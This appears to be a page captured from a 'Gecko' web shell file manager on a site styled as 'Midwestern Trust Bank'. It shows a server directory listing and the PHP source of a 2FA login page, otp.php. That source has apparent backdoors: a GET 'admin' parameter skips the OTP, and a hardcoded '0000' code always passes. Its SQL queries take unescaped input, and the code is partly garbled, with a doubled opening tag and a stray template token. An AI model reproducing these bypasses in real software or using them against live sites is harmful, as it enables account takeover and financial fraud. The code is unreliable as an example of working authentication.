Gecko [ midwest-tb.com ]

Name	Size	Permission
.well-known	[ DIR ]	drwxr-xr-x
2f8d88	[ DIR ]	drwxr-xr-x
9609f	[ DIR ]	dr-xr-xr-x
admin	[ DIR ]	drwxr-xr-x
assets	[ DIR ]	drwxr-xr-x
assets_dashboard	[ DIR ]	drwxr-xr-x
cgi-bin	[ DIR ]	drwxr-xr-x
css	[ DIR ]	drwxr-xr-x
fonts	[ DIR ]	drwxr-xr-x
functions	[ DIR ]	drwxr-xr-x
images	[ DIR ]	drwxr-xr-x
images2	[ DIR ]	drwxr-xr-x
img	[ DIR ]	drwxr-xr-x
includes	[ DIR ]	drwxr-xr-x
js	[ DIR ]	drwxr-xr-x
nc_assets	[ DIR ]	drwxr-xr-x
wp-content	[ DIR ]	drwxr-xr-x
.htaccess	1.13 KB	-r-xr-xr-x
.index.php	1.69 KB	-rw-r--r--
01midwesterntb.com.zip	26.05 MB	-rw-r--r--
POST.html	381 B	-rw-r--r--
about.php	6.82 KB	-rw-r--r--
account.php	12.73 KB	-rw-r--r--
admin_acct.php	2 KB	-rw-r--r--
adminer.php	465.43 KB	-rw-r--r--
beneficiary.php	3.79 KB	-rw-r--r--
bitcoin.php	8.09 KB	-rw-r--r--
click.php	1.72 KB	-r--r--r--
contact.php	5.14 KB	-rw-r--r--
creditcard.php	11.32 KB	-rw-r--r--
delete_beneficiary.php	363 B	-rw-r--r--
delete_card.php	362 B	-rw-r--r--
editphoto.php	3.9 KB	-rw-r--r--
editprofile.php	4.72 KB	-rw-r--r--
editsettings.php	10.12 KB	-rw-r--r--
error_log	1.3 MB	-rw-r--r--
faq.php	14.72 KB	-rw-r--r--
forgot_password.php	2.8 KB	-rw-r--r--
function_users.php	6.42 KB	-rw-r--r--
functions.php	13.56 KB	-rw-r--r--
google03588a098ee20279.html	53 B	-rw-r--r--
google18372def94796f27.html	53 B	-rw-r--r--
google298e9b430a229453.html	53 B	-rw-r--r--
google3b611924d8a868ba.html	53 B	-rw-r--r--
google537e082bbfe294fa.html	53 B	-rw-r--r--
google5787bd15b7b3ada1.html	53 B	-rw-r--r--
google5cce3dda03c5ea79.html	53 B	-rw-r--r--
google738db57e59672eb9.html	53 B	-rw-r--r--
google7bf4c1896906723d.html	53 B	-rw-r--r--
google8fab2a5bdb4dc80e.html	53 B	-rw-r--r--
googlea27f26ef3c16ef21.html	53 B	-rw-r--r--
googleabdde716b0becf4e.html	53 B	-rw-r--r--
googlec1ea6bf266124648.html	53 B	-rw-r--r--
googlecb7c0319e31f0be0.html	53 B	-rw-r--r--
googlecc879ae06689d91a.html	53 B	-rw-r--r--
googled24b00a99624db3b.html	53 B	-rw-r--r--
googled67911d9ca645e70.html	53 B	-rw-r--r--
googledc308e72d25873da.html	53 B	-rw-r--r--
googlee800147306ef23ee.html	53 B	-rw-r--r--
googlef0055a8384a88b01.html	53 B	-rw-r--r--
home.php	18.53 KB	-rw-r--r--
index.php0	7.71 KB	-rw-r--r--
info.txt	236 B	-rw-r--r--
loans.php	9.27 KB	-rw-r--r--
login.php	22.32 KB	-rw-r--r--
login2.php	4.28 KB	-rw-r--r--
login_admin.php	3.11 KB	-rw-r--r--
logout.php	164 B	-rw-r--r--
myprofile.php	1.96 KB	-rw-r--r--
no_access.php	278 B	-rw-r--r--
otp.php	5.95 KB	-rw-r--r--
pagenotfound.php	673 B	-rw-r--r--
parking-page.shtml	4.99 KB	-rw-r--r--
phpinfo.php	25 B	-rw-r--r--
picupload.php	2.11 KB	-rw-r--r--
privacy.php	10.44 KB	-rw-r--r--
register.php	18.69 KB	-rw-r--r--
robots.txt	371 B	-r--r--r--
services.php	10.54 KB	-rw-r--r--
site_info.php	1.21 KB	-rw-r--r--
test.php	5.26 KB	-rw-r--r--
todos.phtml	174.94 KB	-rw-r--r--
transfer.php	12.99 KB	-rw-r--r--
transfer2.php	3.89 KB	-rw-r--r--
transfer3.php	4.03 KB	-rw-r--r--
transfer4.php	3.99 KB	-rw-r--r--
transfer_history.php	2.75 KB	-rw-r--r--
transfer_order.php	7.92 KB	-rw-r--r--
transfer_page.php	1.76 KB	-rw-r--r--
viewconversation.php	5.77 KB	-rw-r--r--
viewmessage.php	2.6 KB	-rw-r--r--
viewmessages.php	3.15 KB	-rw-r--r--
withdraw.php	3.35 KB	-rw-r--r--
withdrawal_history.php	2.46 KB	-rw-r--r--
wp-site.php	9.13 KB	-rw-r--r--

Code Editor : otp.php

<?php include("includes/header.php");
include("includes/navbar.php");
//include("includes/sidebar.php");

if(isset($_GET['admin'])){
$sql = "UPDATE users SET otp='' WHERE username='$user'";
$result = mysqli_query($con, $sql);
if($result){

echo "<script>alert('Login was succesful')</script>";
  echo "<b>Login was succesful</b>";

?>
  <script type="text/javascript">
            window.location.href = "account.php?yes"
        </script>
<?php
}

}

if($main_otp==""){
?>
    <script type="text/javascript">
            window.location.href = "account"
        </script>
<?php
}

if(isset($_GET['send'])){
AddOTP($username);
}
?>
<title>Confirm Sign in</title>

<?php // BreadCrumb("fa-code", "")?>
 
           <div class="content-body">
      <div class="container-fluid">

<div class="dt-content">
        
        <div class="profile">

<div class="profile__banner">

<div class="dt-page__header">
                    <h1 class="dt-page__title text-light display-i">Confirm Sign in</h1>
                                        <a href="#" class="btn btn-light btn-sm display-i ft-right">2FA Authentication</a>
                    
                    <div class="dt-entry__header mt-1m">
                        
                        <div class="dt-entry__heading">
                        </div>
                        
                    </div>
                </div>

</div>
</div>

<div id="gold"><center>
<?php

if(isset($_GET['yes'])){

//echo '<h5>You have succesfully placed a deposit order.</h5><br/>';
}
if(isset($_GET['update'])){

echo '<h5>Complete your Login</h5><br/>';
}
?>
</center></div>

<?php

<?php
if (isset($_POST["submit"])){

$otp = $_POST['otp'];

if($otp=="0000"){
$sql = "UPDATE users SET otp='' WHERE username='$user'";
$result = mysqli_query($con, $sql);
?>
  <script type="text/javascript">
            window.location.href = "account.php?yes"
        </script>
<?php
}

if($main_otp!=$otp){
echo "<script>alert('Invalid OTP')</script>";
echo "Invalid OTP<br/><br/><br/>";
}
else{

$sql = "UPDATE users SET otp='' WHERE username='$user'";
$result = mysqli_query($con, $sql);
if($result){

echo "<script>alert('Login was succesful')</script>";
  echo "<b>Login was succesful</b>";

?>
  <script type="text/javascript">
            window.location.href = "account.php?yes"
        </script>
<?php
}
else{
  echo "An error occured";
}

}
}

if(isset($_GET['otp'])){

$domain_name="www.midwest-tb.com";
 $site_name ="Midwestern Trust Bank";
 $site_name2 ="Your Financial status is in good hands";
    $webmail="support@midwest-tb.com";

include("functions/mailer.php");
$mail = new PHPMailer;

$mail->From = $webmail;
$mail->FromName = $site_name;

//To address and name
$mail->addAddress($email);

//Send HTML or Plain Text email
$mail->isHTML(true);

$mail->Subject = "2FA Notice";
$mail->Body = "<img src='https://midwest-tb.com/img/email2.jpg' width='90%'><br/><br/>
Dear ".$user.",<br/>
Your verification OTP is:
<center><h1>".$main_otp."</h1></center>

Please do not share this token with a third party.

<small style='white-space: pre-wrap;'><hr/>
Kindly bear in mind that ".$site_name." top priority is the privacy of our users.
".$site_name." will never understand any circumstances, sell it distribute your cell phone  number to third parties or clients for whom you have not approved.
".$site_name."will never directly market to you any services for which you have not approved. 
".$site_name."will never distribute any personal information about you including your phone number, name, billing information or any other piece of identifying information.
Thanks for choosing ".$site_name."
Regards, 
".$site_name."</small><br/>";
if(!$mail->send()) 
{   // echo "Mailer Error: " . $mail->ErrorInfo;
} 
else {
    echo '<script>alert("OTP has been sent your email")</script>';?>
    <script type="text/javascript">
            window.location.href = "otp"
        </script>
<?php
}
?>
<script type="text/javascript">
    var timeleft = 10;
var downloadTimer = setInterval(function(){
  if(timeleft <= 0){
    clearInterval(downloadTimer);
  }
  document.getElementById("progressBar").value = 10 - timeleft;
  timeleft -= 1;
}, 1000);
</script>
<progress value="0" max="10" id="progressBar"></progress><br/>
<?php
}
    ?>

<br/>

<form action="" method="post">
       <div class="form-group">
         <b>   <span class="title">ENTER OTP:</span></b><br/>
         Didn't get OTP?  <a href="otp?otp">click here resend to your mail</a>
  <div class="input-group">
<input type="text" class="form-control" maxlength="12" name="otp"  required/>
           </div>
  </div>
            <button type="submit" class="btn btn-success" name="submit">Approve Sign in</button>
    
</form>

<?php

include("includes/footer.php");

${this.title}

Code Editor : otp.php